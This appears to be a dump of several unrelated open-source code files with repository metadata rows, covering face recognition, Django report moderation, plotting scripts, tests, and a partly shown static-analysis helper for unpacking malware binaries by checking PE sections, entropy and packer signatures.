>>> ax.plot(hehe['filtered_ecg'][start_t*400:(start_t+len_t)*400])
>>> for r in [p for p in hehe['rpeaks'] if start_t*400 <= p < (start_t+len_t)*400]:
>>> ax.axvline(r-start_t*400,c='red',linestyle='dashed')
>>> plt.show()
or one can use the 'dataset.py'
"""
| 34.59387 | 175 | 0.646694 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,572 | 0.395614 |
c7c75c3cc68eb1ff8bc4c52efd3bee52faa60a5f | 761 | bzl | Python | ocaml/bootstrap.bzl | mobileink/obazl | eb9d10d1aac040dbc05a038265276e3ab3a52233 | [
"Apache-2.0"
]
| null | null | null | ocaml/bootstrap.bzl | mobileink/obazl | eb9d10d1aac040dbc05a038265276e3ab3a52233 | [
"Apache-2.0"
]
| null | null | null | ocaml/bootstrap.bzl | mobileink/obazl | eb9d10d1aac040dbc05a038265276e3ab3a52233 | [
"Apache-2.0"
]
| null | null | null | ## mv to //:WORKSPACE.bzl ocaml_configure
load("//ocaml/_bootstrap:ocaml.bzl", _ocaml_configure = "ocaml_configure")
# load("//ocaml/_bootstrap:obazl.bzl", _obazl_configure = "obazl_configure")
load("//ocaml/_rules:ocaml_repository.bzl" , _ocaml_repository = "ocaml_repository")
# load("//ocaml/_rules:opam_configuration.bzl" , _opam_configuration = "opam_configuration")
# load("//ocaml/_toolchains:ocaml_toolchains.bzl",
# _ocaml_toolchain = "ocaml_toolchain",
# _ocaml_register_toolchains = "ocaml_register_toolchains")
# obazl_configure = _obazl_configure
ocaml_configure = _ocaml_configure
ocaml_repository = _ocaml_repository
# ocaml_toolchain = _ocaml_toolchain
# ocaml_register_toolchains = _ocaml_register_toolchains
| 38.05 | 96 | 0.768725 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 607 | 0.797635 |
c7c963a523b032b23261574567ab5a4c018c9176 | 44 | py | Python | tsts.py | tedtroxell/metrician | d4164dbff8db5645ee8beca11dc55ba6c26c4cb6 | [
"MIT"
]
| null | null | null | tsts.py | tedtroxell/metrician | d4164dbff8db5645ee8beca11dc55ba6c26c4cb6 | [
"MIT"
]
| null | null | null | tsts.py | tedtroxell/metrician | d4164dbff8db5645ee8beca11dc55ba6c26c4cb6 | [
"MIT"
]
| null | null | null | from metrician.explainations.tests import *
| 22 | 43 | 0.840909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
c7c9b4be102dc7ada3fac5b424f329fc54878619 | 3,021 | py | Python | simple/facenet.py | taflahi/facenet | 64e74744437e18978782b497b42300b8d4a2342b | [
"MIT"
]
| 5 | 2018-09-25T21:04:39.000Z | 2020-09-03T20:07:37.000Z | simple/facenet.py | SoloSynth1/facenet | 64e74744437e18978782b497b42300b8d4a2342b | [
"MIT"
]
| null | null | null | simple/facenet.py | SoloSynth1/facenet | 64e74744437e18978782b497b42300b8d4a2342b | [
"MIT"
]
| 14 | 2018-10-15T00:03:24.000Z | 2020-08-11T05:04:24.000Z | import tensorflow as tf
from .. src.align import detect_face
from .. src import facenet
from .. simple import download_model
import sys
import os
from os.path import expanduser
import copy
import cv2
import numpy as np
from scipy import spatial
minsize = 20 # minimum size of face
threshold = [0.6, 0.7, 0.7] # three steps's threshold
factor = 0.709 # scale factor
def align_face(images, image_size=160, margin=11):
with tf.Graph().as_default():
sess = tf.Session(config=tf.ConfigProto(log_device_placement=False))
with sess.as_default():
pnet, rnet, onet = detect_face.create_mtcnn(sess, None)
tmp_image_paths = copy.copy(images)
img_list = []
for image in tmp_image_paths:
img = cv2.imread(os.path.expanduser(image))[:, :, ::-1]
img_size = np.asarray(img.shape)[0:2]
bounding_boxes, _ = detect_face.detect_face(
img, minsize, pnet, rnet, onet, threshold, factor)
if len(bounding_boxes) < 1:
image_paths.remove(image)
print("can't detect face, remove ", image)
continue
det = np.squeeze(bounding_boxes[0, 0:4])
bb = np.zeros(4, dtype=np.int32)
bb[0] = np.maximum(det[0] - margin / 2, 0)
bb[1] = np.maximum(det[1] - margin / 2, 0)
bb[2] = np.minimum(det[2] + margin / 2, img_size[1])
bb[3] = np.minimum(det[3] + margin / 2, img_size[0])
cropped = img[bb[1]:bb[3], bb[0]:bb[2], :]
aligned = cv2.resize(cropped[:, :, ::-1],
(image_size, image_size))[:, :, ::-1]
prewhitened = facenet.prewhiten(aligned)
img_list.append(prewhitened)
images = np.stack(img_list)
return images
def embedding(images):
# check is model exists
home = expanduser('~')
model_path = home + '/.facenet_model/20180408-102900/20180408-102900.pb'
if not os.path.exists(model_path):
print("model not exists, downloading model")
download_model.download()
print("model downloaded to " + model_path)
with tf.Graph().as_default():
with tf.Session() as sess:
facenet.load_model(model_path)
# Get input and output tensors
images_placeholder = tf.get_default_graph().get_tensor_by_name("input:0")
embeddings = tf.get_default_graph().get_tensor_by_name("embeddings:0")
phase_train_placeholder = tf.get_default_graph().get_tensor_by_name("phase_train:0")
# Run forward pass to calculate embeddings
feed_dict = {images_placeholder: images,
phase_train_placeholder: False}
emb = sess.run(embeddings, feed_dict=feed_dict)
return emb
def compare(images, threshold=0.7):
emb = embedding(images)
sims = np.zeros((len(images), len(images)))
for i in range(len(images)):
for j in range(len(images)):
sims[i][j] = (
1 - spatial.distance.cosine(emb[i], emb[j]) > threshold)
return sims
| 35.127907 | 96 | 0.620655 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 336 | 0.111221 |
c7cb28d53e6c7e1382fc471314a689bf2b0e9252 | 172 | py | Python | athena/athena/errors.py | aculich/openmappr | c9e5b4cfc974a6eda9cbc8a0ea6f8a96ce35efba | [
"MIT"
]
| 19 | 2018-04-05T23:33:33.000Z | 2022-03-24T00:18:20.000Z | athena/athena/errors.py | aculich/openmappr | c9e5b4cfc974a6eda9cbc8a0ea6f8a96ce35efba | [
"MIT"
]
| 13 | 2018-01-10T23:31:11.000Z | 2018-07-20T12:55:02.000Z | athena/athena/errors.py | aculich/openmappr | c9e5b4cfc974a6eda9cbc8a0ea6f8a96ce35efba | [
"MIT"
]
| 5 | 2018-02-12T05:33:19.000Z | 2019-09-21T22:43:02.000Z |
class AthenaError(Exception):
"""base class for all athena exceptions"""
pass
class AthenaMongoError(AthenaError):
"""Class for all mongo related errors"""
pass | 21.5 | 46 | 0.726744 | 169 | 0.982558 | 0 | 0 | 0 | 0 | 0 | 0 | 82 | 0.476744 |
c7cb2a8553964cb9e86d2c3de96decefdde5eb6c | 89 | py | Python | tf2stats/__init__.py | TheAntecedent/Quintessence | f32dc1b11ded212121ebc0f925d15c845cb6ea4b | [
"MIT"
]
| 1 | 2019-10-08T04:38:08.000Z | 2019-10-08T04:38:08.000Z | tf2stats/__init__.py | TheAntecedent/Quintessence | f32dc1b11ded212121ebc0f925d15c845cb6ea4b | [
"MIT"
]
| 1 | 2021-04-30T20:51:05.000Z | 2021-04-30T20:51:05.000Z | tf2stats/__init__.py | TheAntecedent/Quintessence | f32dc1b11ded212121ebc0f925d15c845cb6ea4b | [
"MIT"
]
| null | null | null | from .aggregated_stats import *
from .game_stats import *
from .stat_definitions import * | 29.666667 | 31 | 0.808989 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
c7cb514f4b628937e89d11a214a0267002c52972 | 1,515 | py | Python | tests/test_messages/test_inbound/test_manage_all_link_record.py | michaeldavie/pyinsteon | e5b2e2910f4eff1474f158051fa71f75c2077dd6 | [
"MIT"
]
| 15 | 2020-07-08T05:29:14.000Z | 2022-03-24T18:56:26.000Z | tests/test_messages/test_inbound/test_manage_all_link_record.py | michaeldavie/pyinsteon | e5b2e2910f4eff1474f158051fa71f75c2077dd6 | [
"MIT"
]
| 107 | 2019-06-03T09:23:02.000Z | 2022-03-31T23:12:38.000Z | tests/test_messages/test_inbound/test_manage_all_link_record.py | michaeldavie/pyinsteon | e5b2e2910f4eff1474f158051fa71f75c2077dd6 | [
"MIT"
]
| 16 | 2019-01-24T01:09:49.000Z | 2022-02-24T03:48:42.000Z | """Test Manage All-Link Record."""
import unittest
from binascii import unhexlify
from pyinsteon.address import Address
from pyinsteon.constants import AckNak, ManageAllLinkRecordAction, MessageId
from pyinsteon.protocol.messages.all_link_record_flags import \
AllLinkRecordFlags
from tests import set_log_levels
from tests.utils import hex_to_inbound_message
# pylint: disable=no-member
class TestManageAllLinkRecord(unittest.TestCase):
"""Test Manage All-Link Record."""
def setUp(self):
"""Set up test."""
self.hex = "026F400405060708090a0b"
self.hex_ack = "026F400405060708090a0b06"
self.message_id = MessageId(0x6F)
self.action = ManageAllLinkRecordAction(0x40)
self.flags = AllLinkRecordFlags(0x04)
self.group = int(0x05)
self.address = Address("060708")
self.data1 = int(0x09)
self.data2 = int(0x0A)
self.data3 = int(0x0B)
self.ack = AckNak(0x06)
self.msg, self.msg_bytes = hex_to_inbound_message(self.hex_ack)
set_log_levels(
logger="info",
logger_pyinsteon="info",
logger_messages="info",
logger_topics=False,
)
def test_id(self):
"""Test ID."""
assert self.msg.message_id == self.message_id
def test_ack_nak(self):
"""Test ACK/NAK."""
assert self.msg.ack == self.ack
def test_bytes(self):
"""Test bytes."""
assert bytes(self.msg) == unhexlify(self.hex_ack)
| 30.3 | 76 | 0.654785 | 1,119 | 0.738614 | 0 | 0 | 0 | 0 | 0 | 0 | 239 | 0.157756 |
c7cbc44076f7cb93b253c24fadcf22b9899a01e8 | 5,054 | py | Python | Clock/Clock_Fig3F.py | chAwater/OpenFig | d37d59c6a77d76c7d8a9e8623ce94a95406f1843 | [
"MIT"
]
| null | null | null | Clock/Clock_Fig3F.py | chAwater/OpenFig | d37d59c6a77d76c7d8a9e8623ce94a95406f1843 | [
"MIT"
]
| null | null | null | Clock/Clock_Fig3F.py | chAwater/OpenFig | d37d59c6a77d76c7d8a9e8623ce94a95406f1843 | [
"MIT"
]
| null | null | null | #!/usr/bin/env python
# coding: utf-8
# # Figure Info.
#
# | Title | Journal | Authors | Article Date | Code Date | Figure | Links |
# |:------|:-------:|:-------:|:------------:|:---------:|:------:|:-----:|
# |A microfluidic approach for experimentally modelling <br> the intercellular coupling system of a mammalian <br> circadian clock at single-cell level|Lab on a Chip|Kui Han|2020.03.02|2020.03.11| Fig3F | [DOI](https://doi.org/10.1039/D0LC00140F) |
#
# In[1]:
# data_file = 'SinPeaksDOWN.xls'
# new_inputs = pd.read_excel(data_file,header=None)
# new_inputs.to_csv('data.csv',index=False)
# In[2]:
import os, sys, warnings
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.rcParams['svg.fonttype'] = 'none'
sns.set_context(context='poster')
bigsize = 20
midsize = 18
smallsize = 14
hugesize = 24
# In[ ]:
# Load data
new_inputs = pd.read_csv('data.csv')
new_inputs = new_inputs.values.flatten()
new_inputs = new_inputs[~np.isnan(new_inputs)]
new_inputs = pd.Series(new_inputs)
dict_time = new_inputs.astype(int).value_counts()
# Set start and end days
d_min = np.floor( ((new_inputs-12)/24).astype(np.float).min() )
d_min = max(0, d_min)
d_max = np.ceil( ((new_inputs-12)/24).astype(np.float).max() )
drug_time = 22 + np.arange(0,d_max+1)*24
# Set plot
n_plot = int( d_max - d_min + 1 )
n_rows = int( np.ceil(n_plot/4) )
ratio_dfs_dict = dict(zip(np.arange(n_plot), [pd.DataFrame()]*n_plot))
fig, axs = plt.subplots(
ncols=4,nrows=n_rows,
figsize=(18,n_rows*4),
subplot_kw={'polar':True},
gridspec_kw={'hspace':0.5},
)
axs = axs.flatten()
# Plot data for each 24h
for i_time in dict_time.keys():
if i_time<12:
continue
d_time = int( np.floor((i_time-12)/24)-d_min )
# In one day
ratio_df = ratio_dfs_dict[d_time]
ratio_df = ratio_df.append(
{
'ref_time' : ((i_time-12) % 24),
'n' : dict_time[i_time]
}, ignore_index=True)
ratio_dfs_dict[d_time] = ratio_df
# Date to r
t_time = (((i_time-12) % 24)/24)*2*np.pi
t_drug = ((1+drug_time[d_time]-12)%24)/24*2*np.pi
axs[d_time].bar(t_drug, 1, width=2/24*2*np.pi, bottom=0.0, color='bisque', edgecolor='k', alpha=0.7, zorder=10)
axs[d_time].scatter(t_time, 0.5, color='dodgerblue', s=dict_time[i_time]*30, alpha=0.7, zorder=20)
# Plot info for each 24h
for i,ax in enumerate(axs):
labels = (12+np.arange(24*(d_min+i),24*(d_min+i+1),6)).astype(int).astype(str)
labels[0] = str( int(labels[0])+24 ) + ' / ' + labels[0]
labels[2] = labels[2] + ' h'
ax.set_xticklabels( labels, fontsize=midsize )
ax.set_yticklabels([])
ax.tick_params(axis='x', pad=0)
ratio_df = ratio_dfs_dict[i]
if ratio_df.shape[0]!=0:
r_df = pd.concat(
[
ratio_df['n'],
pd.cut(
ratio_df['ref_time'],
bins =[0, 3, 10, 14, 24 ],
labels=[ 'Q1','Q2','Q3','Q4'],
include_lowest=True,
)
], axis=1
).groupby('ref_time').sum()
r = np.round( 100*(r_df.loc['Q3']/r_df.sum())['n'], 1 )
ax.text( 12/24*2*np.pi, -0.5, str(r)+'%', fontsize=smallsize, ha='center', va='center', color='tomato' )
ax.plot(
np.linspace(10, 14, 20)/24*2*np.pi,
[0.05]*20,
lw=5, color='tomato',alpha=0.7,
zorder=20,
)
ax.set_thetagrids([0,90,180,270])
ax.set_theta_zero_location('N')
ax.set_theta_direction(-1)
ax.set_rgrids([])
ax.set_rlim(0,1)
ax.set_rorigin(-1.0)
ax.annotate(
s='',
xytext=(np.pi/8,1),
xy=(np.pi*3/8,1),
size=40,
arrowprops={
'facecolor':'black',
'arrowstyle':'->',
'connectionstyle':"arc3,rad=-0.17",
},
)
ax.text(np.pi/4,1,'Time',fontsize=smallsize, rotation=-40, ha='center',va='bottom')
else:
lgs = []
for s in np.arange(5,30,5):
lg = ax.scatter(s, 0.5, color='dodgerblue', s=s*30, alpha=0.7, zorder=1, label=s)
lgs.append(lg)
lg = ax.scatter(1,1,marker='s',s=300, color='bisque', edgecolor='k', alpha=0.7, label='Drug')
lgs.append(lg)
ax.set_rlim(0,0.1)
ax.axis('off')
ax.legend(
handles=lgs,
ncol=2,
title='# of cells',
title_fontsize=midsize,
fontsize=smallsize,
frameon=False,
labelspacing=1.5,
handletextpad=0.2,
columnspacing=0.4,
)
fig.subplots_adjust(hspace=0.3)
fig.suptitle('Cells distribution under drug treatment', y=1, fontsize=hugesize)
fig.savefig('Clock_Fig3F.svg', transparent=True, bbox_inches='tight')
fig.savefig('Clock_Fig3F.png', transparent=True, bbox_inches='tight')
plt.show()
# In[ ]:
| 28.234637 | 248 | 0.564108 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,142 | 0.22596 |
c7cbd8f6da109df8e878fcc548912f6a3815a1c2 | 10,733 | py | Python | rameniaapp/views/report.py | awlane/ramenia | 6bf8e75a1f279ac584daa4ee19927ffccaa67551 | [
"MIT"
]
| null | null | null | rameniaapp/views/report.py | awlane/ramenia | 6bf8e75a1f279ac584daa4ee19927ffccaa67551 | [
"MIT"
]
| null | null | null | rameniaapp/views/report.py | awlane/ramenia | 6bf8e75a1f279ac584daa4ee19927ffccaa67551 | [
"MIT"
]
| null | null | null | from django.shortcuts import render, HttpResponse, HttpResponseRedirect
from django.template import loader
from django.conf import settings
from django.contrib.auth.models import User
from rameniaapp.models import ReviewReport, ProfileReport, NoodleReport, Report, Review, Profile, Noodle
from django.views.generic import ListView, FormView, CreateView
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth.decorators import login_required
from rameniaapp.decorators import user_is_moderator
from rameniaapp.actionhookutils import dispatch_hook
from rameniaapp.utils import UserIsModeratorMixin
from django.forms.widgets import Select
from django.contrib import messages
class ReportForm(LoginRequiredMixin, CreateView):
'''Class based view for creating reports'''
template_name = "report_form.html"
model = Report
success_url = "/app"
fields = ["reason"]
url_path = "/app"
login_url="/app/login"
def get_form(self, form_class=None):
form = super(ReportForm, self).get_form(form_class)
form.fields['reason'].widget.attrs.update({'class':'form-control'})
return form
def form_valid(self, form):
'''Ensures hidden form values are filled'''
form.instance.reporter = self.request.user
form.instance.status = 'OP'
return super().form_valid(form)
def get_context_data(self, **kwargs):
'''Adds url_path value and relevant object id to template'''
context = super().get_context_data(**kwargs)
context["id"] = self.kwargs["id"]
context["url_path"] = self.url_path
return context
class NoodleReportForm(ReportForm):
'''Class based view for reporting noodles'''
model = NoodleReport
#This is used to allow the form to create the correct object
url_path = "noodle_report"
def form_valid(self, form):
'''Ensures hidden form values are filled'''
form.instance.noodle = Noodle.objects.get(pk=self.kwargs["id"])
form.instance.type = 'ND'
return super().form_valid(form)
def get_context_data(self, **kwargs):
'''Passes item name to template'''
context = super().get_context_data(**kwargs)
context["name"] = Noodle.objects.get(pk=self.kwargs["id"]).name
return context
class ReviewReportForm(ReportForm):
'''Class based view for reporting reviews'''
model = ReviewReport
url_path = "review_report"
def form_valid(self, form):
'''Ensures hidden form values are filled'''
form.instance.review = Review.objects.get(pk=self.kwargs["id"])
form.instance.type = 'RV'
return super().form_valid(form)
def get_context_data(self, **kwargs):
'''Passes item name to template'''
context = super().get_context_data(**kwargs)
context["name"] = Review.objects.get(pk=self.kwargs["id"]).title
return context
class ProfileReportForm(ReportForm):
'''Class based view for reporting profile'''
model = ProfileReport
url_path = "profile_report"
def form_valid(self, form):
'''Ensures hidden form values are filled'''
form.instance.profile = Profile.objects.get(pk=self.kwargs["id"])
form.instance.type = 'PF'
return super().form_valid(form)
def get_context_data(self, **kwargs):
'''Passes item name to template'''
context = super().get_context_data(**kwargs)
context["name"] = Profile.objects.get(pk=self.kwargs["id"]).name
return context
class ReportList(LoginRequiredMixin, UserIsModeratorMixin, ListView):
'''Class based view for viewing reports'''
# These values are overriden for the subclasses so we can create
# multiple types of noodles without rewriting code
model = Report
item_type = ""
context_object_name = "reports"
template_name = "report_view.html"
login_url="/app/login"
def get_queryset(self):
'''Get all reports for specific objects'''
if "item_id" in self.kwargs:
item_tuple = self.get_item(self.kwargs["item_id"])
self.kwargs[item_tuple[0]] = item_tuple[1]
# This prevents the next line from breaking
del self.kwargs["item_id"]
# Using get_item, this lets us filter for any kind of object without
# writing extra code
return self.model.objects.filter(**self.kwargs)
def get_item(self, id):
'''Returns a tuple containing the key name and item'''
return (None, None)
def get_context_data(self, **kwargs):
'''Knowing the item type lets us not break things'''
context = super().get_context_data(**kwargs)
context['item_type'] = self.item_type
return context
class NoodleReportList(ReportList):
'''List of noodle reports'''
model = NoodleReport
item_type = "Noodles"
def get_item(self, id):
'''Returns a tuple containing the key name and item'''
noodle = Noodle.objects.get(id=id)
return ("noodle", noodle)
class ReviewReportList(ReportList):
'''List of review reports'''
model = ReviewReport
item_type = "Reviews"
def get_item(self, id):
'''Returns a tuple containing the key name and item'''
review = Review.objects.get(id=id)
return ("review", review)
class ProfileReportList(ReportList):
'''List of profile reports'''
model = ProfileReport
item_type = "Profiles"
def get_item(self, id):
'''Returns a tuple containing the key name and item'''
profile = Profile.objects.get(id=id)
return ("profile", profile)
@login_required(login_url="/app/login")
@user_is_moderator
def ban_user(request, report_type, user_id):
'''Ban a user by their id; expects report_type arg for redirect reasons'''
if request.method == "POST":
user = User.objects.get(pk=user_id).delete()
path = None
if report_type == "ND":
path = "reports/noodle"
elif report_type == "RV":
path = "reports/review"
elif report_type == "PF":
path = "reports/profile"
messages.add_message(request, messages.WARNING, "User banned")
return HttpResponseRedirect("/app/mod/{}".format(path))
else:
return HttpResponseRedirect("/app/mod")
@login_required(login_url="/app/login")
@user_is_moderator
def delete_content(request, report_id):
'''This method deletes offending items that have been reported, or just their content'''
if request.method == "POST":
report = Report.objects.get(pk=report_id)
reporter = report.reporter
creator = None
path = get_return_path(report)
# Deleting object is dependent on type
if report.type == "RV":
report = ReviewReport.objects.get(pk=report_id)
creator = report.review.reviewer
report.review.delete()
elif report.type == "ND":
report = NoodleReport.objects.get(pk=report_id)
creator = report.noodle.editor
report.noodle.delete()
elif report.type == "PF":
# Deleting a profile will break fundamental assumptions, so we instead
# remove all content from it.
report = ProfileReport.objects.get(pk=report_id)
report.profile.name = "AnonymousUser"
report.profile.profile_pic = Profile._meta.get_field('profile_pic').default
report.profile.metadata["Description"] = ""
report.profile.save()
creator = report.profile.user
report.delete()
# If we delete the content, it was reasonable to report it
dispatch_hook(reporter, "good-report")
if creator:
# If the noodle's creator hasn't been banned, penalize them
dispatch_hook(creator, "bad-content")
messages.add_message(request, messages.WARNING, "Content deleted")
return HttpResponseRedirect("/app/mod/reports/{}".format(path))
else:
return HttpResponseRedirect("/app/mod")
@login_required(login_url="/app/login")
@user_is_moderator
def update_report_status(request, report_id, status):
'''Change report status to "open", "resolved", or "spam"'''
if request.method == "POST":
# Validate status is the correct value
if status in dict(Report.STATUS_CHOICES):
report = Report.objects.get(pk=report_id)
report.status = status
report.save()
creator = None
path = get_return_path(report)
# Get the creator of the relevant object/report
if report.type == "RV":
report = ReviewReport.objects.get(pk=report_id)
creator = report.review.reviewer
elif report.type == "ND":
report = NoodleReport.objects.get(pk=report_id)
creator = report.noodle.editor
elif report.type == "PF":
report = ProfileReport.objects.get(pk=report_id)
creator = report.profile.user
# Reward people for good reports
if status == "ED":
if report.reporter:
dispatch_hook(report.reporter, "good-report")
if creator:
dispatch_hook(creator, "bad-content")
messages.add_message(request, messages.SUCCESS, "Report marked as resolved")
# Penalize people for bad reports
if status == "SP":
if report.reporter:
dispatch_hook(report.reporter, "bad-report")
messages.add_message(request, messages.WARNING, "Report marked as spam")
return HttpResponseRedirect("/app/mod/reports/{}".format(path))
else:
return HttpResponseRedirect("/app/mod")
@login_required(login_url="/app/login")
@user_is_moderator
def ignore_report(request, report_id):
'''Ignore (delete) a report'''
if request.method == "POST":
report = Report.objects.get(pk=report_id)
path = get_return_path(report)
if report.reporter:
# We assume a bad report is worth deleting if its creator
# wasn't banned
dispatch_hook(report.reporter, "bad-report")
report.delete()
messages.add_message(request, messages.WARNING, "Report ignored")
return HttpResponseRedirect("/app/mod/reports/{}".format(path))
else:
return HttpResponseRedirect("/app/mod")
def get_return_path(report):
'''Util method to return a correct redirect path'''
if report.type == "RV":
return "review"
elif report.type == "ND":
return "noodle"
elif report.type == "PF":
return "profile" | 39.171533 | 104 | 0.644461 | 4,914 | 0.45784 | 0 | 0 | 4,848 | 0.451691 | 0 | 0 | 2,895 | 0.269729 |
c7cce7b123c5282102e29d889ac9141ac4ccb76e | 10,135 | py | Python | pyparser.py | ddurvaux/PyUnpacker | 13c90379c26c4a9ae8c2c4d94e26f2de9709ae1d | [
"MIT"
]
| null | null | null | pyparser.py | ddurvaux/PyUnpacker | 13c90379c26c4a9ae8c2c4d94e26f2de9709ae1d | [
"MIT"
]
| 1 | 2017-02-06T11:06:11.000Z | 2017-02-06T11:07:29.000Z | pyparser.py | ddurvaux/PyUnpacker | 13c90379c26c4a9ae8c2c4d94e26f2de9709ae1d | [
"MIT"
]
| null | null | null | #!/usr/bin/python
#
# This tool is an attempt to automate some taks related
# to malware unpacking.
#
# Most (if not all) of the tricks used in this tool
# directly comes from an excellent course given
# by Nicolas Brulez (@nicolasbrulez)
#
# Tool developped by David DURVAUX for Autopsit
# (commercial brand of N-Labs sprl)
#
# TODO
# - everything
# - VirusTotal Support
# - dynamic analysis (GDB? Valgring?)
# - static code analysis with Radare2
# - add argument for PEID
# - save status / restore (config/analysis)
# - extract fucnction without offset for comparison of samples
# - ..
#
#
__author__ = 'David DURVAUX'
__contact__ = '[email protected]'
__version__ = '0.01'
# Imports required by this tool
import os
import sys
import json
import pefile
import peutils
import argparse
from distorm3 import Decode, Decode16Bits, Decode32Bits, Decode64Bits, Decompose, DecomposeGenerator, DF_STOP_ON_FLOW_CONTROL
# Imports part of this tool
import static.vivframework
# --------------------------------------------------------------------------- #
# REPRESENTATION OF THE CONFIGURATION
# --------------------------------------------------------------------------- #
class Configuration:
force = False # force to redo all the analysis
modstatic = None # static analysis module
moddynamic = None # dynamic analysis module
# DB downloaded on
# https://raw.githubusercontent.com/viper-framework/viper/master/data/peid/UserDB.TXT (UPX not detected)
# https://raw.githubusercontent.com/ynadji/peid/master/userdb.txt (problems)
# http://blog.didierstevens.com/programs/yara-rules/
signatures = peutils.SignatureDatabase('./peid/peid-userdb-rules-with-pe-module.yara')
def __init__(self):
return
def save(self, filename="./config.json"):
config = {
"force": self.force,
"modstatic": self.modstatic,
"moddynamic": self.moddynamic
}
try:
# write configuration to file
fd = open(filename, "w")
json.dump(config, fd)
fd.close()
print("Configuration saved to %s" % filename)
except Exception as e:
print("Impossible to save configuration to %s" % filename)
print(e)
return
def load(self, filename="./config.json"):
config = {}
try:
# read configuration from file
fd = open(filename, "r")
config = json.load(fd)
fd.close()
# update internal state
self.__dict__[key] = config[key]
except Exception as e:
print("Impossible to load configuration from %s" % filename)
print(e)
return
# --------------------------------------------------------------------------- #
# REPRESENTATION OF THE INFO RETRIEVED
# --------------------------------------------------------------------------- #
class BinaryInformations:
"""
This class will represent and hold all the information
retrieved from the binary
"""
vtinfo = {}
peheader = {}
bininfo = {}
settings = {}
packed_score = 0 # current packed score
packed_test = 0 # number of test done
breakpoints = [] # breakoint to set for unpacking
anti_debug = False
def __init__(self):
return
def log(self):
#TODO IMPLEMENT
return
def save(self, filename=sys.stdout):
print ("NOT YET IMPLEMENTED!")
return
# --------------------------------------------------------------------------- #
# STATIC ANALYSIS OF BINARY
# --------------------------------------------------------------------------- #
class StaticAnalysis:
"""
Tools to analyze statically binaries
@TODO: define access to page_size, margin, entropy_threshold and packed_score
"""
# class variable
configuration = None
binary = None
bininfo = None
page_size = 0
margin= 0
entropy_threshold = 0
packed_score = 0
SFLAGS = {
"CODE" : 0x00000020,
"DATA" : 0x00000040,
"EXEC" : 0x20000000,
"READ" : 0x40000000,
"WRIT" : 0x80000000
# other: check https://msdn.microsoft.com/en-us/library/ms809762.aspx
}
def __init__(self, binary, configuration, page_size=0x1000, margin=0.1, entropy_threshold = 7.0, packed_score=0):
"""
binary the path to the binary to analyze
"""
# set parameters
self.binary = binary
self.page_size = page_size
self.margin = margin
self.entropy_threshold = entropy_threshold
self.packed_score = packed_score
# instanciate internal objects
self.pe = pefile.PE(binary)
self.bininfo = BinaryInformations()
# keep track of the current configuration
self.configuration = configuration
# initialize static analysis module (TODO - add support for others)
self.configuration.modstatic = static.vivframework.Vivisect(self.binary, self.bininfo, self.configuration.force)
# update BinaryInformation with current settings:
self.bininfo.settings["peanalysis"] = {
"binary" : self.binary,
"page_size" : self.page_size,
"margin" : self.margin,
"entropy_threshold" : self.entropy_threshold,
"packed_score" : self.packed_score
}
# CHECK BINARY SECTIONS
def analyzeSections(self):
"""
TODO: mutliple output support, number of test
Need to Add:
- check section names
- check where entry point is located (in the last section)
- first section should be writeable
- last section should be executable
- ...
"""
# check number of sections
if(len(self.pe.sections)) != 3:
print "ABNOMALIE in NUMBER OF SECTIONS (%d)!!" % len(self.pe.sections)
self.bininfo.packed_score += 1
self.bininfo.packed_test += 1
# check section + boundary and see if it matches
for section in self.pe.sections:
[name, vaddr, vsize, rsize, flags] = [section.Name, section.VirtualAddress, section.Misc_VirtualSize, section.SizeOfRawData, section.Characteristics]
# check flags
if( int(flags ^ (self.SFLAGS["EXEC"] | self.SFLAGS["WRIT"])) == 0 ): # check if section is executable + writeable
print "ABNOMALIE SECTION SHOULD NOT BE WRITEABLE AND EXECUTABLE (W^X violation)!!"
self.bininfo.packed_score += 1
# check sections sizes (incl. page alignment)
# the rsize need to be written in a multiple of memory page size (min 1.)
# a margin is added (could be customized)
if (rsize / self.page_size + 1) * self.page_size * (1 + self.margin) < vsize:
print "ABNOMALIES with VIRTUAL SIZE ALLOCATION for SECTION: %s" % name
self.bininfo.packed_score += 1
# check entropy
if(section.get_entropy() >= self.entropy_threshold):
print "ABNORMAL ENTROPY (%s)) for SECTION: %s" % (section.get_entropy(), name)
self.bininfo.packed_score += 1
# update bininfo status
self.bininfo.packed_test += 3 # 3 tests are done for each section
print ("TOTAL PACKED SCORE: %s / %s" % (self.bininfo.packed_score, self.bininfo.packed_test))
return self.bininfo
def callPEiD(self):
"""
Use set of YARA rules to search for known packers
TODO - add a check on signature presence or download or end
- postpone initialization of signatures DB here!!
"""
matches = self.configuration.signatures.match(self.pe, ep_only = True)
if(matches is not None):
if(len(matches) > 0):
print "PACKER FOUND: %s" % matches[0]
return self.bininfo
def graphSearch(self):
"""
Do a graph search in the code for leaf nodes
"""
self.configuration.modstatic.graphSearch()
def isAntiDebug(self):
if self.configuration.modstatic.isAntiDebug():
print "WARNING: ANTI-DEBUGGING TRICKS FOUND!"
def searchVirtualAlloc(self):
self.configuration.modstatic.searchVirtualAlloc()
def getPerFunctionHash(self):
self.configuration.modstatic.getPerFunctionHash()
def decompile(self):
"""
! need to take in account offset in memory !
-- CODE TO REMOVE -- DEPRECATED --
"""
fd = open(self.binary, "rb")
l = DecomposeGenerator(0x100, fd.read(), Decode32Bits, DF_STOP_ON_FLOW_CONTROL)
while(l is not None):
# -- BEGIN TEST CODE --
for i in l:
#print "0x%08x (%02x) %-20s %s" % (i[0], i[1], i[3], i[2])
print "0x%08x %s" % (i.address, i)
# -- END TEST CODE --
l = DecomposeGenerator(0x100, fd.read(), Decode32Bits, DF_STOP_ON_FLOW_CONTROL)
fd.close()
return
# --------------------------------------------------------------------------- #
# MAIN SECTION OF CODE
# --------------------------------------------------------------------------- #
def start_analysis(binary, configuration):
sa = StaticAnalysis(binary, configuration)
sa.analyzeSections()
sa.callPEiD()
sa.graphSearch()
sa.isAntiDebug()
sa.searchVirtualAlloc()
sa.getPerFunctionHash() #TEST
#sa.decompile() # TEST
return
def main():
# Argument definition
parser = argparse.ArgumentParser(description='Analyse binaries and try to help with deobfuscation')
parser.add_argument('-b', '--binary', help='Binary to analyze')
